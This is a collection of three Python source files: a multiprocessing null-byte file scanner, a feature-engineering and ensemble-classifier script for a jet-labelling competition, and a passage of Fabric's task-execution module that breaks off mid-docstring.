| source | python |
|---|---|
scan.py
|
# -*- coding: utf-8 -*-
from functools import partial
from multiprocessing import Process
import multiprocessing as mp
import sys
import os
import platform
import unicodedata
# https://github.com/pyinstaller/pyinstaller/wiki/Recipe-Multiprocessing
# Module multiprocessing is organized differently in Python 3.4+
try:
# Python 3.4+
if sys.platform.startswith('win'):
import multiprocessing.popen_spawn_win32 as forking
else:
import multiprocessing.popen_fork as forking
except ImportError:
import multiprocessing.forking as forking
if sys.platform.startswith('win'):
# First define a modified version of Popen.
class _Popen(forking.Popen):
def __init__(self, *args, **kw):
if hasattr(sys, 'frozen'):
# We have to set original _MEIPASS2 value from sys._MEIPASS
# to get --onefile mode working.
os.putenv('_MEIPASS2', sys._MEIPASS)
try:
super(_Popen, self).__init__(*args, **kw)
finally:
if hasattr(sys, 'frozen'):
# On some platforms (e.g. AIX) 'os.unsetenv()' is not
# available. In those cases we cannot delete the variable
# but only set it to the empty string. The bootloader
# can handle this case.
if hasattr(os, 'unsetenv'):
os.unsetenv('_MEIPASS2')
else:
os.putenv('_MEIPASS2', '')
# Second override 'Popen' class with our modified version.
forking.Popen = _Popen
def read_in_chunks(file_object, chunk_size=4 * 1024 * 1024):
"""Lazy function (generator) to read a file piece by piece.
    Default chunk size: 4 MB.
"""
while True:
data = file_object.read(chunk_size)
if not data:
break
yield data
def do_work(in_queue, out_queue, null_char):
"""Pulls data from in_queue, counts number of null characters,
and sends result to out_queue.
"""
while True:
        item = in_queue.get()
        # bytes.count() works on both Python 2 and 3; iterating a bytes object
        # on Python 3 yields ints, which would never compare equal to b'\x00'.
        null = item.count(null_char)
out_queue.put(null)
in_queue.task_done()
def scan(name, work_queue, result_queue):
"""Loads data into work_queue, then gets results from result_queue."""
try:
with open(name, 'rb') as f:
for i in read_in_chunks(f):
work_queue.put(i)
except IOError:
return 'Error'
else:
work_queue.join()
null_count = sum([result_queue.get()
for i in range(result_queue.qsize())])
return null_count
def create_workers(work_queue, result_queue, null_char=b'\x00'):
"""Generates daemonized worker processes."""
num_workers = mp.cpu_count() - 1
if num_workers < 1:
num_workers = 1
# Start workers
worker_list = []
for i in range(num_workers):
t = Process(target=do_work, args=(work_queue, result_queue, null_char))
worker_list.append(t)
t.daemon = True
t.start()
return worker_list
def scan_target(path, files, directories):
"""
    Processes the given path.
    If the path is not a directory, it is added to the files list.
    If the path is a directory, all of its entries are added to the
    files and directories lists as appropriate.
    Returns the list of files and the list of directories.
"""
path = os.path.abspath(path)
if not os.path.isdir(path):
files.append(path)
return files, directories
directory_list = [
unicodedata.normalize('NFC', f) for f in os.listdir(path)]
for entry in directory_list:
entry_path = os.path.join(path, entry)
if os.path.isdir(entry_path):
directories.append(entry_path)
else:
files.append(entry_path)
return files, directories
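# NOTE: the driver that wires these pieces together is not shown above. The
# guarded block below is a hypothetical usage sketch (not part of the original
# file): spawn the daemon workers, walk a target path with scan_target(), and
# print the null-byte count that scan() computes for each file.
if __name__ == '__main__':
    mp.freeze_support()  # keeps PyInstaller --onefile builds happy on Windows
    work_queue = mp.JoinableQueue()  # do_work() calls task_done(), so a JoinableQueue is required
    result_queue = mp.Queue()
    create_workers(work_queue, result_queue)
    files, directories = scan_target(sys.argv[1] if len(sys.argv) > 1 else '.', [], [])
    while directories:
        files, directories = scan_target(directories.pop(), files, directories)
    for name in files:
        print('{0}: {1} null bytes'.format(name, scan(name, work_queue, result_queue)))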
|
baseline_merge.py
|
# -*- coding: utf-8 -*-
"""
Created on Tue Dec 17 19:59:45 2019
@author: jack
"""
import numpy as np  # linear algebra
import pandas as pd  # data processing, CSV file I/O (e.g. pd.read_csv)
from sklearn.model_selection import StratifiedKFold
import gc
import os
from keras.utils import to_categorical
from sklearn.metrics import classification_report
from catboost import CatBoostRegressor, CatBoostClassifier
from xgboost import XGBClassifier
from imblearn.over_sampling import SMOTE
import xgboost as xgb
import seaborn as sns
import matplotlib.pyplot as plt
from sklearn.ensemble import RandomForestClassifier
from sklearn.ensemble import GradientBoostingClassifier
from lightgbm import LGBMRegressor
from sklearn.metrics import mean_squared_error
from sklearn.model_selection import GridSearchCV
from sklearn.externals import joblib
from sklearn import svm
from multiprocessing import Pool
import math
pd.set_option('display.max_rows', 500)
pd.set_option('display.max_columns', 500)
def count_column(df,column):
tp = df.groupby(column).count().reset_index()
tp = tp[list(tp.columns)[0:2]]
tp.columns = [column, column+'_count']
df=df.merge(tp,on=column,how='left')
return df
def count_mean(df,base_column,count_column):
tp = df.groupby(base_column).agg({count_column: ['mean']}).reset_index()
tp.columns = [base_column, base_column+'_'+count_column+'_mean']
df = df.merge(tp, on=base_column, how='left')
return df
def count_count(df,base_column,count_column):
tp = df.groupby(base_column).agg({count_column: ['count']}).reset_index()
tp.columns = [base_column, base_column+'_'+count_column+'_count']
df = df.merge(tp, on=base_column, how='left')
return df
def count_sum(df,base_column,count_column):
tp = df.groupby(base_column).agg({count_column: ['sum']}).reset_index()
tp.columns = [base_column, base_column+'_'+count_column+'_sum']
df = df.merge(tp, on=base_column, how='left')
return df
def count_std(df,base_column,count_column):
tp = df.groupby(base_column).agg({count_column: ['std']}).reset_index()
tp.columns = [base_column, base_column+'_'+count_column+'_std']
df = df.merge(tp, on=base_column, how='left')
return df
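# Worked example of the helpers above (hypothetical toy data, shown for clarity only):
# given df = pd.DataFrame({'event_id': [1, 1, 2], 'jet_mass': [10.0, 20.0, 5.0]}),
# count_mean(df, 'event_id', 'jet_mass') left-joins the per-event mean back onto
# every jet row, adding a column 'event_id_jet_mass_mean' with values
# [15.0, 15.0, 5.0]; count_sum, count_std and count_count behave the same way
# for sum, std and count.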
train=pd.read_csv('./data/simple_train_R04_jet.csv')#,encoding = 'UTF-8')
test=pd.read_csv('./data/simple_test_R04_jet.csv')#,encoding = 'UTF-8')
def energy(df):
x=df['jet_px']
y=df['jet_py']
z= df['jet_pz']
return (x**2+y**2+z**2)**0.5
train['energy']=train.apply(energy,axis=1)
test['energy']=test.apply(energy,axis=1)
train['x_n']=train['jet_px']/train['energy']
train['y_n']=train['jet_py']/train['energy']
train['z_n']=train['jet_pz']/train['energy']
test['x_n']=test['jet_px']/test['energy']
test['y_n']=test['jet_py']/test['energy']
test['z_n']=test['jet_pz']/test['energy']
def x_sub_mean_del_std(df):
df_mean = df.mean()
df_std = df.std()
return df.apply(lambda x:(x-df_mean) / df_std)
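# x_sub_mean_del_std is a column-wide z-score: each value is centred on the column
# mean and scaled by the column std. The apply() call above is equivalent to the
# vectorised form (df - df.mean()) / df.std(), which would be faster on large
# frames; the result is identical either way.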
train['energy_sub_mean_del_std'] = x_sub_mean_del_std(train['jet_energy'])
test['energy_sub_mean_del_std'] = x_sub_mean_del_std(test['jet_energy'])
train=count_mean(train,'event_id','energy_sub_mean_del_std')
train=count_sum(train,'event_id','energy_sub_mean_del_std')
train=count_std(train,'event_id','energy_sub_mean_del_std')
train=count_count(train,'event_id','energy_sub_mean_del_std')
test=count_mean(test,'event_id','energy_sub_mean_del_std')
test=count_sum(test,'event_id','energy_sub_mean_del_std')
test=count_std(test,'event_id','energy_sub_mean_del_std')
test=count_count(test,'event_id','energy_sub_mean_del_std')
train['mass_sub_mean_del_std'] = x_sub_mean_del_std(train['jet_mass'])
test['mass_sub_mean_del_std'] = x_sub_mean_del_std(test['jet_mass'])
train=count_mean(train,'event_id','mass_sub_mean_del_std')
train=count_sum(train,'event_id','mass_sub_mean_del_std')
train=count_std(train,'event_id','mass_sub_mean_del_std')
train=count_count(train,'event_id','mass_sub_mean_del_std')
test=count_mean(test,'event_id','mass_sub_mean_del_std')
test=count_sum(test,'event_id','mass_sub_mean_del_std')
test=count_std(test,'event_id','mass_sub_mean_del_std')
test=count_count(test,'event_id','mass_sub_mean_del_std')
# def danwei(df):
# # df_max = df.max()
# # df_min = df.min()
# # x = df['jet_px']
# # y = df['jet_py']
# # z = df['jet_pz']
# x_norm = df.apply(lambda x: x['jet_px']/(x['jet_px']**2+x['jet_py']**2+x['jet_pz']**2 )**0.5)
# y_norm = df.apply(lambda x: x['jet_py']/(x['jet_px']**2+x['jet_py']**2+x['jet_pz']**2 )**0.5)
# z_norm = df.apply(lambda x: x['jet_pz']/(x['jet_px']**2+x['jet_py']**2+x['jet_pz']**2 )**0.5)
# return x_norm,y_norm,z_norm
train['distence'] = (train['jet_px']**2 + train['jet_py']**2 + train['jet_pz']**2)**0.5
train['x_d'] = train['jet_px'] / train['distence']
train['y_d'] = train['jet_py'] / train['distence']
train['z_d'] = train['jet_pz'] / train['distence']
# train['y_d'] = danwei(train['jet_py'])
# train['z_d'] = danwei(train['jet_pz'])
#train['x_d'],train['y_d'],train['z_d'] = danwei(train)
#test['x_d'] = danwei(test['jet_px'])
#test['y_d'] = danwei(test['jet_py'])
#test['z_d'] = danwei(test['jet_pz'])
#test['x_d'],test['y_d'],test['z_d'] = danwei(test)
test['distence'] = (test['jet_px']**2 + test['jet_py']**2 + test['jet_pz']**2)**0.5
test['x_d'] = test['jet_px'] / test['distence']
test['y_d'] = test['jet_py'] / test['distence']
test['z_d'] = test['jet_pz'] / test['distence']
train['x_energy'] = train['x_d'] * train['jet_energy']
train['y_energy'] = train['y_d'] * train['jet_energy']
train['z_energy'] = train['z_d'] * train['jet_energy']
test['x_energy'] = test['x_d'] * test['jet_energy']
test['y_energy'] = test['y_d'] * test['jet_energy']
test['z_energy'] = test['z_d'] * test['jet_energy']
train=count_mean(train,'event_id','distence')
train=count_sum(train,'event_id','distence')
train=count_std(train,'event_id','distence')
train=count_count(train,'event_id','distence')
test=count_mean(test,'event_id','distence')
test=count_sum(test,'event_id','distence')
test=count_std(test,'event_id','distence')
test=count_count(test,'event_id','distence')
train=count_mean(train,'event_id','x_energy')
train=count_sum(train,'event_id','x_energy')
train=count_std(train,'event_id','x_energy')
train=count_count(train,'event_id','x_energy')
train=count_mean(train,'event_id','y_energy')
train=count_sum(train,'event_id','y_energy')
train=count_std(train,'event_id','y_energy')
train=count_count(train,'event_id','y_energy')
train=count_mean(train,'event_id','z_energy')
train=count_sum(train,'event_id','z_energy')
train=count_std(train,'event_id','z_energy')
train=count_count(train,'event_id','z_energy')
test=count_mean(test,'event_id','x_energy')
test=count_sum(test,'event_id','x_energy')
test=count_std(test,'event_id','x_energy')
test=count_count(test,'event_id','x_energy')
test=count_mean(test,'event_id','y_energy')
test=count_sum(test,'event_id','y_energy')
test=count_std(test,'event_id','y_energy')
test=count_count(test,'event_id','y_energy')
test=count_mean(test,'event_id','z_energy')
test=count_sum(test,'event_id','z_energy')
test=count_std(test,'event_id','z_energy')
test=count_count(test,'event_id','z_energy')
train=count_mean(train,'event_id','x_d')
train=count_sum(train,'event_id','x_d')
train=count_std(train,'event_id','x_d')
train=count_count(train,'event_id','x_d')
train=count_mean(train,'event_id','y_d')
train=count_sum(train,'event_id','y_d')
train=count_std(train,'event_id','y_d')
train=count_count(train,'event_id','y_d')
train=count_mean(train,'event_id','z_d')
train=count_sum(train,'event_id','z_d')
train=count_std(train,'event_id','z_d')
train=count_count(train,'event_id','z_d')
test=count_mean(test,'event_id','x_d')
test=count_sum(test,'event_id','x_d')
test=count_std(test,'event_id','x_d')
test=count_count(test,'event_id','x_d')
test=count_mean(test,'event_id','y_d')
test=count_sum(test,'event_id','y_d')
test=count_std(test,'event_id','y_d')
test=count_count(test,'event_id','y_d')
test=count_mean(test,'event_id','z_d')
test=count_sum(test,'event_id','z_d')
test=count_std(test,'event_id','z_d')
test=count_count(test,'event_id','z_d')
train=count_mean(train,'event_id','x_n')
train=count_sum(train,'event_id','x_n')
train=count_std(train,'event_id','x_n')
train=count_count(train,'event_id','x_n')
train=count_mean(train,'event_id','y_n')
train=count_sum(train,'event_id','y_n')
train=count_std(train,'event_id','y_n')
train=count_count(train,'event_id','y_n')
train=count_mean(train,'event_id','z_n')
train=count_sum(train,'event_id','z_n')
train=count_std(train,'event_id','z_n')
train=count_count(train,'event_id','z_n')
test=count_mean(test,'event_id','x_n')
test=count_sum(test,'event_id','x_n')
test=count_std(test,'event_id','x_n')
test=count_count(test,'event_id','x_n')
test=count_mean(test,'event_id','y_n')
test=count_sum(test,'event_id','y_n')
test=count_std(test,'event_id','y_n')
test=count_count(test,'event_id','y_n')
test=count_mean(test,'event_id','z_n')
test=count_sum(test,'event_id','z_n')
test=count_std(test,'event_id','z_n')
test=count_count(test,'event_id','z_n')
train['abs']=train['jet_energy']-train['energy']
test['abs']=test['jet_energy']-test['energy']
train['energy_sum'] = train['jet_energy']+train['energy']
test['energy_sum'] = test['jet_energy']+test['energy']
train['energy_every'] = train['energy_sum'] / train['number_of_particles_in_this_jet']
test['energy_every'] = test['energy_sum'] / test['number_of_particles_in_this_jet']
train['mul_energy_mass'] = train['jet_energy'] * train['jet_mass']
test['mul_energy_mass'] = test['jet_energy'] * test['jet_mass']
train['V'] = train['jet_energy'] / train['jet_mass']
test['V'] = test['jet_energy'] / test['jet_mass']
train['mvv'] = train['V']**2 * train['jet_mass']
test['mvv'] = test['V']**2 * test['jet_mass']
train = count_mean(train,'event_id','mvv')
train = count_sum(train,'event_id','mvv')
train = count_std(train,'event_id','mvv')
train = count_count(train,'event_id','mvv')
test = count_mean(test,'event_id','mvv')
test = count_sum(test,'event_id','mvv')
test = count_std(test,'event_id','mvv')
test = count_count(test,'event_id','mvv')
train = count_mean(train,'event_id','V')
train = count_sum(train,'event_id','V')
train = count_std(train,'event_id','V')
train = count_count(train,'event_id','V')
test = count_mean(test,'event_id','V')
test = count_sum(test,'event_id','V')
test = count_std(test,'event_id','V')
test = count_count(test,'event_id','V')
train['x_v'] = train['V'] / train['jet_px']
train['y_v'] = train['V'] / train['jet_py']
train['z_v'] = train['V'] / train['jet_pz']
test['x_v'] = test['V'] / test['jet_px']
test['y_v'] = test['V'] / test['jet_py']
test['z_v'] = test['V'] / test['jet_pz']
train = count_mean(train,'event_id','x_v')
train = count_sum(train,'event_id','x_v')
train = count_std(train,'event_id','x_v')
train = count_count(train,'event_id','x_v')
train = count_mean(train,'event_id','y_v')
train = count_sum(train,'event_id','y_v')
train = count_std(train,'event_id','y_v')
train = count_count(train,'event_id','y_v')
train = count_mean(train,'event_id','z_v')
train = count_sum(train,'event_id','z_v')
train = count_std(train,'event_id','z_v')
train = count_count(train,'event_id','z_v')
test = count_mean(test,'event_id','x_v')
test = count_sum(test,'event_id','x_v')
test = count_std(test,'event_id','x_v')
test = count_count(test,'event_id','x_v')
test = count_mean(test,'event_id','y_v')
test = count_sum(test,'event_id','y_v')
test = count_std(test,'event_id','y_v')
test = count_count(test,'event_id','y_v')
test = count_mean(test,'event_id','z_v')
test = count_sum(test,'event_id','z_v')
test = count_std(test,'event_id','z_v')
test = count_count(test,'event_id','z_v')
train = count_mean(train,'event_id','mul_energy_mass')
train = count_sum(train,'event_id','mul_energy_mass')
train = count_std(train,'event_id','mul_energy_mass')
train = count_count(train,'event_id','mul_energy_mass')
test = count_mean(test,'event_id','mul_energy_mass')
test = count_sum(test,'event_id','mul_energy_mass')
test = count_std(test,'event_id','mul_energy_mass')
test = count_count(test,'event_id','mul_energy_mass')
train = count_mean(train,'event_id','energy_every')
train = count_sum(train,'event_id','energy_every')
train = count_std(train,'event_id','energy_every')
train = count_count(train,'event_id','energy_every')
test = count_mean(test,'event_id','energy_every')
test = count_sum(test,'event_id','energy_every')
test = count_std(test,'event_id','energy_every')
test = count_count(test,'event_id','energy_every')
train = count_mean(train,'event_id','energy_sum')
train = count_sum(train,'event_id','energy_sum')
train = count_std(train,'event_id','energy_sum')
train = count_count(train,'event_id','energy_sum')
test = count_mean(test,'event_id','energy_sum')
test = count_sum(test,'event_id','energy_sum')
test = count_std(test,'event_id','energy_sum')
test = count_count(test,'event_id','energy_sum')
train=count_mean(train,'event_id','number_of_particles_in_this_jet')
train=count_sum(train,'event_id','number_of_particles_in_this_jet')
train=count_std(train,'event_id','number_of_particles_in_this_jet')
train=count_count(train,'event_id','number_of_particles_in_this_jet')
train=count_mean(train,'event_id','jet_mass')
train=count_sum(train,'event_id','jet_mass')
train=count_std(train,'event_id','jet_mass')
train=count_count(train,'event_id','jet_mass')
train=count_mean(train,'event_id','jet_energy')
train=count_sum(train,'event_id','jet_energy')
train=count_std(train,'event_id','jet_energy')
train=count_count(train,'event_id','jet_energy')
train['mean_energy']=train['jet_energy']/train['number_of_particles_in_this_jet']
train['mean_jet_mass']=train['jet_mass']/train['number_of_particles_in_this_jet']
train=count_mean(train,'event_id','mean_energy')
train=count_sum(train,'event_id','mean_energy')
train=count_std(train,'event_id','mean_energy')
train=count_count(train,'event_id','mean_energy')
train=count_mean(train,'event_id','mean_jet_mass')
train=count_sum(train,'event_id','mean_jet_mass')
train=count_std(train,'event_id','mean_jet_mass')
train=count_count(train,'event_id','mean_jet_mass')
train=count_mean(train,'event_id','abs')
train=count_sum(train,'event_id','abs')
train=count_std(train,'event_id','abs')
train=count_count(train,'event_id','abs')
train=count_mean(train,'event_id','energy')
train=count_sum(train,'event_id','energy')
train=count_std(train,'event_id','energy')
train=count_count(train,'event_id','energy')
test=count_mean(test,'event_id','number_of_particles_in_this_jet')
test=count_sum(test,'event_id','number_of_particles_in_this_jet')
test=count_std(test,'event_id','number_of_particles_in_this_jet')
test=count_count(test,'event_id','number_of_particles_in_this_jet')
test=count_mean(test,'event_id','jet_mass')
test=count_sum(test,'event_id','jet_mass')
test=count_std(test,'event_id','jet_mass')
test=count_count(test,'event_id','jet_mass')
test=count_mean(test,'event_id','jet_energy')
test=count_sum(test,'event_id','jet_energy')
test=count_std(test,'event_id','jet_energy')
test=count_count(test,'event_id','jet_energy')
test['mean_energy']=test['jet_energy']/test['number_of_particles_in_this_jet']
test['mean_jet_mass']=test['jet_mass']/test['number_of_particles_in_this_jet']
test=count_mean(test,'event_id','mean_energy')
test=count_sum(test,'event_id','mean_energy')
test=count_std(test,'event_id','mean_energy')
test=count_count(test,'event_id','mean_energy')
test=count_mean(test,'event_id','mean_jet_mass')
test=count_sum(test,'event_id','mean_jet_mass')
test=count_std(test,'event_id','mean_jet_mass')
test=count_count(test,'event_id','mean_jet_mass')
test=count_mean(test,'event_id','abs')
test=count_sum(test,'event_id','abs')
test=count_std(test,'event_id','abs')
test=count_count(test,'event_id','abs')
test=count_mean(test,'event_id','energy')
test=count_sum(test,'event_id','energy')
test=count_std(test,'event_id','energy')
test=count_count(test,'event_id','energy')
#d={1:[1,0,0,0,],4:[0,1,0,0],5:[0,0,1,0],21:[0,0,0,1]}
d={1:0,4:1,5:2,21:3}
def label_process(x):
x=d[x]
return x
train['label']=train['label'].apply(label_process)
#train_y=train.pop('label').values
#train_y=np.array(list(train_y))
_=train.pop('jet_id')
test_id=test.pop('jet_id')
_=train.pop('event_id')
_=test.pop('event_id')
#train=train.values
#test=test.values
#train.to_csv('train_xy.csv')
train_target_21 = train[train.label==3]
train_target_1 = train[train.label==0]
train_target_4 = train[train.label==1]
train_target_5 = train[train.label==2]
print(train_target_21.shape)
print(train_target_1.shape)
print(train_target_4.shape)
print(train_target_5.shape)
#test_data = pd.read_csv(test_path,index_col="id")
xgb = XGBClassifier(nthread=16)
res = pd.DataFrame(index=test.index,columns=['id','label'])
#train_p = pd.DataFrame(index=train_data.index)
'''
21 358600
1 261207
4 260186
5 254562
Name: label, dtype: int64
'''
estimator = LGBMRegressor(num_leaves=31)
param_grid = {
'learning_rate': [0.01, 0.1, 1],
'n_estimators': [20, 40]
}
#xgb = GridSearchCV(xgb, param_grid, scoring='roc_auc')
xgb_param_dist = {'n_estimators':range(80,200,4),'max_depth':range(2,15,1),'learning_rate':np.linspace(0.01,2,20),'subsample':np.linspace(0.7,0.9,20),'colsample_bytree':np.linspace(0.5,0.98,10),'min_child_weight':range(1,9,1)}
gbm = GridSearchCV(estimator, param_grid)
gbdt = GradientBoostingClassifier(random_state=10)
catboost = CatBoostClassifier(
iterations=2000,
od_type='Iter',
od_wait=120,
max_depth=10,
learning_rate=0.02,
l2_leaf_reg=9,
random_seed=2019,
metric_period=50,
fold_len_multiplier=1.1,
loss_function='MultiClass',
logging_level='Verbose'
)
rfc = RandomForestClassifier(random_state=0)
def train(ite):
    print(ite)
    data = train_target_21.sample(254562)  # the data shows roughly 1:0 = 17:2 (> 0.5)
data = data.append(train_target_1.sample(254562))
data = data.append(train_target_4.sample(254562))
data = data.append(train_target_5.sample(254562))
y_ = data.label
del data['label']
if ite%3== 0:
arg = xgb
if ite%3==1:
arg = gbm
if ite % 3 == 2:
arg = catboost
# if ite % 4 == 3:
# arg = rfc
arg.fit(data,y_)
# train_p[ite] = xgb.predict(train_data)
res[ite] = arg.predict(test)
del arg
gc.collect()
#import threading
#print('start')
#for i in range(3):
# for j in range(4):
# threading.Thread(target=run, args=(i*3+j,)).start()
#print('end')
#
for i in range(30):
train(i)
sub=pd.DataFrame()
res = res.apply(lambda x: x.value_counts().index[0],axis =1)
res = res.apply(lambda x: int(x))
dd={0:1,1:4,2:5,3:21}
def sub_process(x):
x=dd[x]
return x
sub['label']=list(res)
sub['label']=sub['label'].apply(sub_process)
sub['id']=list(test_id)
#a = resT.apply(sum)
#a/3
#b= a/3
#c=pd.DataFrame(b)
res.to_csv('xgb_balence.csv')
sub.to_csv('sub_baseline.csv')
|
tasks.py
|
from __future__ import with_statement
import inspect
import sys
import textwrap
from fabric import state
from fabric.utils import abort, warn, error
from fabric.network import to_dict, normalize_to_string, disconnect_all
from fabric.context_managers import settings
from fabric.job_queue import JobQueue
from fabric.task_utils import crawl, merge, parse_kwargs
from fabric.exceptions import NetworkError
if sys.version_info[:2] == (2, 5):
# Python 2.5 inspect.getargspec returns a tuple
# instead of ArgSpec namedtuple.
class ArgSpec(object):
def __init__(self, args, varargs, keywords, defaults):
self.args = args
self.varargs = varargs
self.keywords = keywords
self.defaults = defaults
self._tuple = (args, varargs, keywords, defaults)
def __getitem__(self, idx):
return self._tuple[idx]
def patched_get_argspec(func):
return ArgSpec(*inspect._getargspec(func))
inspect._getargspec = inspect.getargspec
inspect.getargspec = patched_get_argspec
def get_task_details(task):
details = [
textwrap.dedent(task.__doc__)
if task.__doc__
else 'No docstring provided']
argspec = inspect.getargspec(task)
default_args = [] if not argspec.defaults else argspec.defaults
num_default_args = len(default_args)
args_without_defaults = argspec.args[:len(argspec.args) - num_default_args]
args_with_defaults = argspec.args[-1 * num_default_args:]
details.append('Arguments: %s' % (
', '.join(
args_without_defaults + [
'%s=%r' % (arg, default)
for arg, default in zip(args_with_defaults, default_args)
])
))
return '\n'.join(details)
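# For illustration (hypothetical task, not defined in this module): given
#     def deploy(target, branch='master'):
#         "Deploy the app."
# get_task_details(deploy) returns roughly:
#     Deploy the app.
#     Arguments: target, branch='master'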
def _get_list(env):
def inner(key):
return env.get(key, [])
return inner
class Task(object):
"""
Abstract base class for objects wishing to be picked up as Fabric tasks.
Instances of subclasses will be treated as valid tasks when present in
fabfiles loaded by the :doc:`fab </usage/fab>` tool.
For details on how to implement and use `~fabric.tasks.Task` subclasses,
please see the usage documentation on :ref:`new-style tasks
<new-style-tasks>`.
.. versionadded:: 1.1
"""
name = 'undefined'
use_task_objects = True
aliases = None
is_default = False
# TODO: make it so that this wraps other decorators as expected
def __init__(self, alias=None, aliases=None, default=False, name=None,
*args, **kwargs):
if alias is not None:
self.aliases = [alias, ]
if aliases is not None:
self.aliases = aliases
if name is not None:
self.name = name
self.is_default = default
def __details__(self):
return get_task_details(self.run)
def run(self):
raise NotImplementedError
def get_hosts(self, arg_hosts, arg_roles, arg_exclude_hosts, env=None):
"""
Return the host list the given task should be using.
See :ref:`host-lists` for detailed documentation on how host lists are
set.
"""
env = env or {'hosts': [], 'roles': [], 'exclude_hosts': []}
roledefs = env.get('roledefs', {})
# Command line per-task takes precedence over anything else.
if arg_hosts or arg_roles:
return merge(arg_hosts, arg_roles, arg_exclude_hosts, roledefs)
# Decorator-specific hosts/roles go next
func_hosts = getattr(self, 'hosts', [])
func_roles = getattr(self, 'roles', [])
if func_hosts or func_roles:
return merge(func_hosts, func_roles, arg_exclude_hosts, roledefs)
# Finally, the env is checked (which might contain globally set lists
# from the CLI or from module-level code). This will be the empty list
# if these have not been set -- which is fine, this method should
# return an empty list if no hosts have been set anywhere.
env_vars = map(_get_list(env), "hosts roles exclude_hosts".split())
env_vars.append(roledefs)
return merge(*env_vars)
def get_pool_size(self, hosts, default):
# Default parallel pool size (calculate per-task in case variables
# change)
default_pool_size = default or len(hosts)
# Allow per-task override
# Also cast to int in case somebody gave a string
from_task = getattr(self, 'pool_size', None)
pool_size = int(from_task or default_pool_size)
# But ensure it's never larger than the number of hosts
pool_size = min((pool_size, len(hosts)))
# Inform user of final pool size for this task
if state.output.debug:
print("Parallel tasks now using pool size of %d" % pool_size)
return pool_size
class WrappedCallableTask(Task):
"""
Wraps a given callable transparently, while marking it as a valid Task.
Generally used via `~fabric.decorators.task` and not directly.
.. versionadded:: 1.1
.. seealso:: `~fabric.docs.unwrap_tasks`, `~fabric.decorators.task`
"""
def __init__(self, callable, *args, **kwargs):
super(WrappedCallableTask, self).__init__(*args, **kwargs)
self.wrapped = callable
# Don't use getattr() here -- we want to avoid touching self.name
# entirely so the superclass' value remains default.
if hasattr(callable, '__name__'):
if self.name == 'undefined':
self.__name__ = self.name = callable.__name__
else:
self.__name__ = self.name
if hasattr(callable, '__doc__'):
self.__doc__ = callable.__doc__
if hasattr(callable, '__module__'):
self.__module__ = callable.__module__
def __call__(self, *args, **kwargs):
return self.run(*args, **kwargs)
def run(self, *args, **kwargs):
return self.wrapped(*args, **kwargs)
def __getattr__(self, k):
return getattr(self.wrapped, k)
def __details__(self):
return get_task_details(self.wrapped)
def requires_parallel(task):
"""
Returns True if given ``task`` should be run in parallel mode.
Specifically:
* It's been explicitly marked with ``@parallel``, or:
* It's *not* been explicitly marked with ``@serial`` *and* the global
parallel option (``env.parallel``) is set to ``True``.
"""
return (
(state.env.parallel and not getattr(task, 'serial', False))
or getattr(task, 'parallel', False)
)
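# Concretely: with env.parallel False, a task still runs in parallel only if it
# was decorated with @parallel; with env.parallel True, every task runs in
# parallel unless it was explicitly decorated with @serial.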
def _parallel_tasks(commands_to_run):
return any(map(
lambda x: requires_parallel(crawl(x[0], state.commands)),
commands_to_run
))
def parallel_task_target(task, args, kwargs, env, queue):
"""
Wrap in another callable that:
* nukes the connection cache to prevent shared-access problems
* knows how to send the tasks' return value back over a Queue
* captures exceptions raised by the task
"""
from fabric import state as _state
from fabric.network import HostConnectionCache
# Reset all connections from pre-fork
_state.connections = HostConnectionCache()
def submit(result):
queue.put({'name': env.host_string, 'result': result})
try:
with settings(**env):
submit(task.run(*args, **kwargs))
except BaseException, e: # We really do want to capture everything
# SystemExit implies use of abort(), which prints its own
# traceback, host info etc -- so we don't want to double up
# on that. For everything else, though, we need to make
# clear what host encountered the exception that will
# print.
if e.__class__ is not SystemExit:
print >> sys.stderr, "!!! Parallel execution exception under host %r:" % env.host_string
submit(e)
# Here, anything -- unexpected exceptions, or abort()
# driven SystemExits -- will bubble up and terminate the
# child process.
raise
def _execute(task, host, my_env, args, kwargs, jobs, queue, multiprocessing):
"""
Primary single-host work body of execute()
"""
# Log to stdout
if state.output.running and not hasattr(task, 'return_value'):
print("[%s] Executing task '%s'" % (host, my_env['command']))
# Create per-run env with connection settings
local_env = to_dict(host)
local_env.update(my_env)
# Set a few more env flags for parallelism
if queue is not None:
local_env.update({'parallel': True, 'linewise': True})
# Handle parallel execution
if queue is not None: # Since queue is only set for parallel
name = local_env['host_string']
# Wrap in another callable that:
# * expands the env it's given to ensure parallel, linewise, etc are
        #   all set correctly and explicitly. Such changes are naturally
        #   insulated from the parent process.
# * nukes the connection cache to prevent shared-access problems
# * knows how to send the tasks' return value back over a Queue
# * captures exceptions raised by the task
def inner(args, kwargs, queue, name, env):
state.env.update(env)
def submit(result):
queue.put({'name': name, 'result': result})
try:
key = normalize_to_string(state.env.host_string)
state.connections.pop(key, "")
submit(task.run(*args, **kwargs))
except BaseException, e: # We really do want to capture everything
# SystemExit implies use of abort(), which prints its own
# traceback, host info etc -- so we don't want to double up
# on that. For everything else, though, we need to make
# clear what host encountered the exception that will
# print.
if e.__class__ is not SystemExit:
sys.stderr.write("!!! Parallel execution exception under host %r:\n" % name)
submit(e)
# Here, anything -- unexpected exceptions, or abort()
# driven SystemExits -- will bubble up and terminate the
# child process.
raise
# Stuff into Process wrapper
kwarg_dict = {
'args': args,
'kwargs': kwargs,
'queue': queue,
'name': name,
'env': local_env,
}
p = multiprocessing.Process(target=inner, kwargs=kwarg_dict)
# Name/id is host string
p.name = name
# Add to queue
jobs.append(p)
# Handle serial execution
else:
with settings(**local_env):
return task.run(*args, **kwargs)
def _is_task(task):
return isinstance(task, Task)
def execute(task, *args, **kwargs):
"""
Execute ``task`` (callable or name), honoring host/role decorators, etc.
``task`` may be an actual callable object, or it may be a registered task
name, which is used to look up a callable just as if the name had been
given on the command line (including :ref:`namespaced tasks <namespaces>`,
    e.g. ``"deploy.migrate"``).
The task will then be executed once per host in its host list, which is
(again) assembled in the same manner as CLI-specified tasks: drawing from
:option:`-H`, :ref:`env.hosts <hosts>`, the `~fabric.decorators.hosts` or
`~fabric.decorators.roles` decorators, and so forth.
``host``, ``hosts``, ``role``, ``roles`` and ``exclude_hosts`` kwargs will
be stripped out of the final call, and used to set the task's host list, as
if they had been specified on the command line like e.g. ``fab
taskname:host=hostname``.
Any other arguments or keyword arguments will be passed verbatim into
``task`` (the function itself -- not the ``@task`` decorator wrapping your
function!) when it is called, so ``execute(mytask, 'arg1',
kwarg1='value')`` will (once per host) invoke ``mytask('arg1',
kwarg1='value')``.
:returns:
a dictionary mapping host strings to the given task's return value for
that host's execution run. For example, ``execute(foo, hosts=['a',
